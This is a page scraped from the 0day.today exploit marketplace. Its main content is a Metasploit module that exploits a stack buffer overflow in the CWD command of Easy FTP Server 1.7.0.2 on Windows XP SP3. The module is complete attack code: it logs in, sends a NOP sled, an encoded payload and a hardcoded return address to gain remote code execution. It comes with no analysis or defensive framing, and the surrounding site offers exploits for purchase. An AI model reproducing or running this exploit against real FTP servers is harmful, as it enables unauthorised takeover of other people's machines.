0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Easy FTP Server v1.7.0.2 CWD Remote BoF - MSF Module
==================================================== Easy FTP Server v1.7.0.2 CWD Remote BoF - MSF Module ==================================================== # Exploit Title: Easy~FTP # Date: March 9, 2010 # Author: Blake # Version: 1.7.0.2 # Tested on: Windows XP SP3 # CVE : require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) super(update_info(info, 'Name' => 'Easy~FTP Server v1.7.0.2 CWD Command Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in the CWD verb in Easy~FTP Server. You must have valid credentials to trigger this vulnerability. }, 'Author' => 'Blake', 'License' => MSF_LICENSE, 'Version' => 'version 1', 'References' => [ [ 'CVE', ''], [ 'OSVDB', ''], [ 'EDB-ID', '11539'], [ 'URL', 'http://www.exploit-db.com/exploits/11539' ], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 268, 'BadChars' => "\x00\x20\x0a\x0d\x2f\x5c", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP3 English', { 'Ret' => 0x009AFD58 } ], ], 'DisclosureDate' => 'February 15, 2010', 'DefaultTarget' => 0)) end def exploit connect_login sploit = "\x90" * (268 - payload.encoded.length) sploit << payload.encoded sploit << [target.ret].pack('V') print_status("Trying target #{target.name<http://target.name>}...") send_cmd( ['CWD', sploit] , false) handler disconnect end end # 0day.today [2024-11-16] #